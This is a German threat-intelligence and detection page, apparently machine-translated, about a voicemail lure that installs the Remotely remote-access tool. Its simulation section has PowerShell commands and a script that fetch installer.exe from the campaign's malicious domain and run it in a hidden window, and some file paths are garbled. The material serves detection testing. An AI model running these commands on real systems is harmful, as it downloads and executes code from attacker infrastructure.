Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure hosten deutschsprachige „Voicemail“-Landingpages, die Benutzer dazu verleiten, eine BAT-Datei herunterzuladen. Das Skript spielt ein harmloses Audio als Ablenkung ab, während es im Hintergrund das legitime Fernüberwachungswerkzeug Remotely installiert. Sobald der RMM-Agent bereitgestellt ist, erhält der Angreifer durch die vom Angreifer kontrollierte C2-Infrastruktur einen persistenten Fernzugriff.
Untersuchung
Censys identifizierte 86 kompromittierte Web-Eigenschaften auf *.cadillac.ps-Domains, die die schädliche BAT-Datei verbreiten. Das Skript ruft einen auf remotely.billbutterworth.com gehosteten PowerShell-Installer auf, der ein Remotely ZIP-Paket herunterlädt. Das Archiv enthält die Remotely-Agent-Komponenten und einen Dienst, der unter C:Program FilesRemotely installiert wird.
Minderung
Blockieren Sie *.cadillac.ps-Domains und remotely.billbutterworth.com auf der DNS/Proxy-Ebene. Schulen Sie Benutzer, keine unerwarteten BAT-Dateien auszuführen oder PowerShell-Befehle von unbekannten Webseiten zu kopieren/einzufügen. Implementieren Sie Endpunktkontrollen, um die Erstellung von Remotely-Diensten und verdächtige Installationspfade oder nicht signierte Werkzeuge zu erkennen.
Reaktion
Alarmieren Sie bei der Erstellung von Remotely_Service und dem Vorhandensein von Remotely_Agent.exe unter Program Files. Suchen Sie nach voicemail.bat und der zugehörigen PowerShell-Installationsaktivität. Isolieren Sie betroffene Hosts, sammeln Sie forensische Artefakte und rotieren/widerrufen Sie alle vom RMM-Agenten verwendeten Anmeldedaten oder Tokens.
graph TB %% Klassendefinitionen classDef action fill:#99ccff %% Knoten node_content_injection[„<b>Technik</b> – T1659 Content-Injektion<br/>Kompromittierte Webeigenschaft liefert einen bösartigen Link.“] class node_content_injection action node_initial_user_exec[„<b>Technik</b> – T1204.001 Benutzerausführung: Bösartiger Link<br/>Das Opfer klickt auf einen bösartigen Link zu einer kompromittierten Voicemail-Landingpage.“] class node_initial_user_exec action node_cmd_shell[„<b>Technik</b> – T1059.003 Windows-Befehlszeile<br/>BAT-Datei (voicemail.bat) wird heruntergeladen und ausgeführt.“] class node_cmd_shell action node_powershell[„<b>Technik</b> – T1059.001 PowerShell<br/>Das Skript Install-Remotely.ps1 installiert Remotely RMM.“] class node_powershell action node_system_service[„<b>Technik</b> – T1569 Systemdienste<br/>RMM als Windows-Dienst installiert (Remotely_Service).“] class node_system_service action node_masquerading[„<b>Technik</b> – T1036 Tarnung & T1036.008 Dateityp tarnen<br/>BAT als Medienupdate dargestellt; Dateien in Program Files abgelegt.“] class node_masquerading action node_hide_artifacts[„<b>Technik</b> – T1564 Artefakte verbergen<br/>Installationsartefakte in C:\Program Files\Remotely verborgen.“] class node_hide_artifacts action node_c2[„<b>Technik</b> – T1102.002 Bidirektionale Webdienst-Kommunikation & T1071 Anwendungsschichtprotokoll<br/>HTTPS-Kommunikation mit entferntem Server.“] class node_c2 action %% Verbindungen node_content_injection –>|unterstützt| node_initial_user_exec node_initial_user_exec –>|führt_zu| node_cmd_shell node_cmd_shell –>|führt_aus| node_powershell node_powershell –>|installiert| node_system_service node_system_service –>|nutzt| node_masquerading node_system_service –>|nutzt| node_hide_artifacts node_system_service –>|stellt_her| node_c2
Angriffsablauf
Entdeckungen
Download oder Upload via PowerShell (über die Befehlszeile)
Ansehen
Verdächtiges Ransomware-beeinträchtigendes Dienstenende (über die Befehlszeile)
Ansehen
PowerShell führt Datei in verdächtigem Verzeichnis mit Bypass-Ausführungsrichtlinie aus (über die Befehlszeile)
Ansehen
IOCs (HashSha256) zur Erkennung: Voicemail-Falle: Deutschsprachige Voicemail-Köder führt zu Fernzugriff
Ansehen
IOCs (HashMd5) zur Erkennung: Voicemail-Falle: Deutschsprachige Voicemail-Köder führt zu Fernzugriff
Ansehen
Deutscher Voicemail-Köder führt zur RMM-Installation [Webserver]
Ansehen
Erkennung der Ausführung der Voicemail-BAT-Datei [Windows-Dateiereignis]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Basislinien-Vorflugcheck muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die dazu entwickelt wurde, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakt erwartete Telemetrie zu generieren, die der Erkennungslogik entspricht. Abstrakte oder unrelevante Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
- Phishing-Auslieferung: Der Angreifer sendet eine E-Mail mit einem deutschsprachigen Voicemail-Köder-Anhang (HTML), die, wenn geöffnet, das Opfer umleitet zu
http://bannerbank.cadillac.ps/voicemail.html. - Ausführung der Zielseite: Die Zielseite hostet einen schädlichen PowerShell-Einzeiler, der ein Remote-Management-Werkzeug (RMM) installiert und ausführt.
- Prozesserstellung: Wenn der Browser des Opfers die Seite verarbeitet, wird PowerShell mit einer Befehlszeile aufgerufen, die explizit die beiden Zeichenketten enthält, nach denen die Regel sucht.
- Ergebnisende Telemetrie: Windows protokolliert Ereignis-ID 4688 mit einer
Befehlszeiledie sowohl „voicemail-bezogene Landingpage“ and „bannerbank.cadillac.ps“enthält, wodurch die Sigma-Bedingung erfüllt wird.
Der exakte Befehl, der für die Simulation verwendet wurde:
# Simulierte bösartige Ausführung – enthält beide Auslösezeichenfolgen Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-bezogene Landingpage'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - Phishing-Auslieferung: Der Angreifer sendet eine E-Mail mit einem deutschsprachigen Voicemail-Köder-Anhang (HTML), die, wenn geöffnet, das Opfer umleitet zu
-
Regressionstest-Skript: Ein eigenständiges PowerShell-Skript, das den Angriff reproduziert und auf jedem Windows-Rechner mit aktivierter Protokollierung ausgeführt werden kann.
<# .SYNOPSIS Simuliert den deutschen Voicemail-Köder, der die Sigma-Erkennungsregel auslöst. .DESCRIPTION Führt eine PowerShell-Befehlszeile aus, die beide erforderlichen Teilstrings enthält. #> # Definiere schadhafte Zeichenfolgen $lureText = "voicemail-bezogene Landingpage" $maliciousDomain = "bannerbank.cadillac.ps" # Erstelle den Einzeiler, der in der Befehlszeile erscheinen wird $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Starte PowerShell mit der vorbereiteten Befehlszeile $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Starte bösartigen PowerShell-Befehl..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Optional: warte ein paar Sekunden, um die Protokollierung sicherzustellen Start-Sleep -Seconds 5 -
Aufräumbefehle: Entfernen Sie den heruntergeladenen Installer und alle Restprozesse.
# Stoppe alle verbliebenen Installer-Prozesse Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Lösche die temporäre Installer-Datei $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Bereinigt $installerPath" }